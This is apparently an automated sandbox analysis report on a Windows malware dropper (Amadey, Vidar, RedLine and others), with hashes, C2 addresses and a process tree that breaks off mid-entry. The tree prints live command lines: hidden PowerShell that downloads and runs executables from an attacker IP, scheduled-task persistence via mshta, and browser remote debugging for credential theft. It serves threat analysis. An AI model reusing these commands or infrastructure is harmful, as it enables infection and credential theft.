Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19-02-2025 05:48

General

  • Target

    db1bb60253ead1efd2cac1fc3dd58052d28c2e093cfd9a5abae563ebb658dd59.exe

  • Size

    2.0MB

  • MD5

    09c586796227f25da3e37d9203d0c48e

  • SHA1

    49d5b87f50efd6da9fe9d4131680a3f1a2e5a379

  • SHA256

    db1bb60253ead1efd2cac1fc3dd58052d28c2e093cfd9a5abae563ebb658dd59

  • SHA512

    494bbf64373f47b9d5f3fdd8c4d0f85e68171cac3aa2fc89e2678a84d1d23cb5962e582a40cbe1abc787be003ea1b8e8c7eeac7094d2942bc3062211533e07f4

  • SSDEEP

    49152:tLKfSQvj5YQMjrx2vPTVpJBdhAA/lOm/AlvQ1ewa:tWfS6OrqPT7JB74QG

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/defend/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

vidar

C2

https://t.me/g02f04

https://steamcommunity.com/profiles/76561199828130190

Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Vidar Stealer 16 IoCs
  • Detect Xworm Payload 1 IoCs
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Redline family
  • SystemBC

    SystemBC is a proxy and remote administration tool first seen in 2019.

  • Systembc family
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 22 IoCs
  • Blocklisted process makes network request 64 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file 32 IoCs
  • Uses browser remote debugging 2 TTPs 9 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 44 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 8 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 4 IoCs
  • Executes dropped EXE 52 IoCs
  • Identifies Wine through registry keys 2 TTPs 22 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 31 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 9 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • AutoIT Executable 3 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 22 IoCs
  • Suspicious use of SetThreadContext 10 IoCs
  • UPX packed file 60 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 4 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 7 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 23 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 8 IoCs
  • Kills process with taskkill 10 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 40 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\db1bb60253ead1efd2cac1fc3dd58052d28c2e093cfd9a5abae563ebb658dd59.exe
    "C:\Users\Admin\AppData\Local\Temp\db1bb60253ead1efd2cac1fc3dd58052d28c2e093cfd9a5abae563ebb658dd59.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:3532
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2180
      • C:\Users\Admin\AppData\Local\Temp\1086705101\7ad374d310.exe
        "C:\Users\Admin\AppData\Local\Temp\1086705101\7ad374d310.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:2592
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c schtasks /create /tn b9aWcma5o9e /tr "mshta C:\Users\Admin\AppData\Local\Temp\vCWgE21DY.hta" /sc minute /mo 25 /ru "Admin" /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2476
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /tn b9aWcma5o9e /tr "mshta C:\Users\Admin\AppData\Local\Temp\vCWgE21DY.hta" /sc minute /mo 25 /ru "Admin" /f
            5⤵
            • Scheduled Task/Job: Scheduled Task
            PID:1472
        • C:\Windows\SysWOW64\mshta.exe
          mshta C:\Users\Admin\AppData\Local\Temp\vCWgE21DY.hta
          4⤵
          • Checks computer location settings
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2556
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UPJYZ1PTSYGS8EFOQVKA2MZUKRSKRY8H.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Downloads MZ/PE file
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1320
            • C:\Users\Admin\AppData\Local\TempUPJYZ1PTSYGS8EFOQVKA2MZUKRSKRY8H.EXE
              "C:\Users\Admin\AppData\Local\TempUPJYZ1PTSYGS8EFOQVKA2MZUKRSKRY8H.EXE"
              6⤵
              • Modifies Windows Defender DisableAntiSpyware settings
              • Modifies Windows Defender Real-time Protection settings
              • Modifies Windows Defender TamperProtection settings
              • Modifies Windows Defender notification settings
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Windows security modification
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4544
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1086706021\am_no.cmd" "
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4920
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1086706021\am_no.cmd" any_word
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4452
          • C:\Windows\SysWOW64\timeout.exe
            timeout /t 2
            5⤵
            • System Location Discovery: System Language Discovery
            • Delays execution with timeout.exe
            PID:2956
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4808
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1796
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4864
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:212
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3740
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1648
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /tn "tqdKDmaTYkt" /tr "mshta \"C:\Temp\Tgr6wHBf5.hta\"" /sc minute /mo 25 /ru "Admin" /f
            5⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:3712
          • C:\Windows\SysWOW64\mshta.exe
            mshta "C:\Temp\Tgr6wHBf5.hta"
            5⤵
            • Checks computer location settings
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3240
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
              6⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Downloads MZ/PE file
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1740
              • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                7⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious behavior: EnumeratesProcesses
                PID:4868
      • C:\Users\Admin\AppData\Local\Temp\1086724001\amnew.exe
        "C:\Users\Admin\AppData\Local\Temp\1086724001\amnew.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Drops file in Windows directory
        • Suspicious use of WriteProcessMemory
        PID:1352
        • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
          "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
          4⤵
          • Downloads MZ/PE file
          • Checks computer location settings
          • Executes dropped EXE
          • Adds Run key to start application
          PID:2644
          • C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe
            "C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"
            5⤵
            • Executes dropped EXE
            PID:4524
            • C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe
              "C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:1932
          • C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe
            "C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            PID:5104
            • C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe
              "C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"
              6⤵
              • Executes dropped EXE
              PID:4824
            • C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe
              "C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:3300
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 5104 -s 840
              6⤵
              • Program crash
              PID:3528
          • C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe
            "C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            PID:3820
            • C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe
              "C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:3556
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 3820 -s 956
              6⤵
              • Program crash
              PID:1088
          • C:\Users\Admin\AppData\Local\Temp\10005030101\12321321.exe
            "C:\Users\Admin\AppData\Local\Temp\10005030101\12321321.exe"
            5⤵
            • Executes dropped EXE
            PID:2700
          • C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe
            "C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            PID:5092
            • C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe
              "C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2020
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 968
              6⤵
              • Program crash
              PID:2252
          • C:\Users\Admin\AppData\Local\Temp\10008080101\2b062268bb.exe
            "C:\Users\Admin\AppData\Local\Temp\10008080101\2b062268bb.exe"
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            PID:4192
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM firefox.exe /T
              6⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4940
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM chrome.exe /T
              6⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2484
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM msedge.exe /T
              6⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1204
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM opera.exe /T
              6⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4524
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM brave.exe /T
              6⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2352
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
              6⤵
                PID:2172
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                  7⤵
                  • Checks processor information in registry
                  • Modifies registry class
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  • Suspicious use of SetWindowsHookEx
                  PID:5080
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2024 -parentBuildID 20240401114208 -prefsHandle 1920 -prefMapHandle 1912 -prefsLen 27434 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7a09e538-3e4d-4279-a952-6a58defca712} 5080 "\\.\pipe\gecko-crash-server-pipe.5080" gpu
                    8⤵
                      PID:4880
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2444 -parentBuildID 20240401114208 -prefsHandle 2436 -prefMapHandle 2432 -prefsLen 28354 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1df8edcf-6220-4f8a-98a2-aa3abe390297} 5080 "\\.\pipe\gecko-crash-server-pipe.5080" socket
                      8⤵
                        PID:4920
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3120 -childID 1 -isForBrowser -prefsHandle 3112 -prefMapHandle 3108 -prefsLen 22746 -prefMapSize 244658 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2fb5ebc2-d0c9-489c-ba60-9ea67052b295} 5080 "\\.\pipe\gecko-crash-server-pipe.5080" tab
                        8⤵
                          PID:448
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3728 -childID 2 -isForBrowser -prefsHandle 3732 -prefMapHandle 3720 -prefsLen 32844 -prefMapSize 244658 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {83397726-06de-49c7-9a0f-dc696a0e33d6} 5080 "\\.\pipe\gecko-crash-server-pipe.5080" tab
                          8⤵
                            PID:5280
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4392 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4408 -prefMapHandle 4484 -prefsLen 32844 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4548783b-2d86-42c5-972f-c8d9a909fe03} 5080 "\\.\pipe\gecko-crash-server-pipe.5080" utility
                            8⤵
                            • Checks processor information in registry
                            PID:6132
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4880 -childID 3 -isForBrowser -prefsHandle 4872 -prefMapHandle 4868 -prefsLen 27038 -prefMapSize 244658 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0dcfcbfc-37b6-44d4-8205-145a4ded1765} 5080 "\\.\pipe\gecko-crash-server-pipe.5080" tab
                            8⤵
                              PID:5484
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5012 -childID 4 -isForBrowser -prefsHandle 5028 -prefMapHandle 5024 -prefsLen 27038 -prefMapSize 244658 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f45b2e62-3809-465c-ab44-24b3f0da7709} 5080 "\\.\pipe\gecko-crash-server-pipe.5080" tab
                              8⤵
                                PID:5500
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5244 -childID 5 -isForBrowser -prefsHandle 5324 -prefMapHandle 5320 -prefsLen 27038 -prefMapSize 244658 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b6bfb4cf-86fa-43bc-8b36-b2e1357aa35a} 5080 "\\.\pipe\gecko-crash-server-pipe.5080" tab
                                8⤵
                                  PID:5520
                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2020 -parentBuildID 20240401114208 -prefsHandle 2212 -prefMapHandle 3356 -prefsLen 37464 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {88c60443-9bfe-45a0-b18a-1a47c24fc9d7} 5080 "\\.\pipe\gecko-crash-server-pipe.5080" gpu
                                  8⤵
                                    PID:6260
                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3148 -childID 6 -isForBrowser -prefsHandle 3580 -prefMapHandle 5508 -prefsLen 37464 -prefMapSize 244658 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {142025a5-89f9-4c29-b59c-66ae51bebe46} 5080 "\\.\pipe\gecko-crash-server-pipe.5080" tab
                                    8⤵
                                      PID:6860
                              • C:\Users\Admin\AppData\Local\Temp\10008090101\dfd61ff8a1.exe
                                "C:\Users\Admin\AppData\Local\Temp\10008090101\dfd61ff8a1.exe"
                                5⤵
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Checks BIOS information in registry
                                • Executes dropped EXE
                                • Identifies Wine through registry keys
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • Suspicious use of SetThreadContext
                                PID:5644
                                • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                  "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                  6⤵
                                  • Downloads MZ/PE file
                                  • System Location Discovery: System Language Discovery
                                  PID:5564
                          • C:\Users\Admin\AppData\Local\Temp\1086778001\f5904ac2d6.exe
                            "C:\Users\Admin\AppData\Local\Temp\1086778001\f5904ac2d6.exe"
                            3⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            PID:4616
                          • C:\Users\Admin\AppData\Local\Temp\1086779001\c1e53dbdd7.exe
                            "C:\Users\Admin\AppData\Local\Temp\1086779001\c1e53dbdd7.exe"
                            3⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            PID:1648
                            • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                              "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:2020
                          • C:\Users\Admin\AppData\Local\Temp\1086780001\Ta3ZyUR.exe
                            "C:\Users\Admin\AppData\Local\Temp\1086780001\Ta3ZyUR.exe"
                            3⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            • System Location Discovery: System Language Discovery
                            PID:5028
                            • C:\Users\Admin\AppData\Local\Temp\1086780001\Ta3ZyUR.exe
                              "C:\Users\Admin\AppData\Local\Temp\1086780001\Ta3ZyUR.exe"
                              4⤵
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: EnumeratesProcesses
                              PID:4740
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 968
                              4⤵
                              • Program crash
                              PID:1808
                          • C:\Users\Admin\AppData\Local\Temp\1086781001\d2YQIJa.exe
                            "C:\Users\Admin\AppData\Local\Temp\1086781001\d2YQIJa.exe"
                            3⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            PID:2188
                          • C:\Users\Admin\AppData\Local\Temp\1086782001\3omTNLZ.exe
                            "C:\Users\Admin\AppData\Local\Temp\1086782001\3omTNLZ.exe"
                            3⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            PID:4900
                          • C:\Users\Admin\AppData\Local\Temp\1086783001\7aencsM.exe
                            "C:\Users\Admin\AppData\Local\Temp\1086783001\7aencsM.exe"
                            3⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            • System Location Discovery: System Language Discovery
                            PID:2140
                            • C:\Users\Admin\AppData\Local\Temp\1086783001\7aencsM.exe
                              "C:\Users\Admin\AppData\Local\Temp\1086783001\7aencsM.exe"
                              4⤵
                              • Executes dropped EXE
                              PID:888
                            • C:\Users\Admin\AppData\Local\Temp\1086783001\7aencsM.exe
                              "C:\Users\Admin\AppData\Local\Temp\1086783001\7aencsM.exe"
                              4⤵
                              • Checks computer location settings
                              • Executes dropped EXE
                              • Checks processor information in registry
                              • Suspicious behavior: EnumeratesProcesses
                              PID:884
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                5⤵
                                • Uses browser remote debugging
                                • Enumerates system info in registry
                                • Modifies data under HKEY_USERS
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                • Suspicious use of AdjustPrivilegeToken
                                • Suspicious use of FindShellTrayWindow
                                PID:4868
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
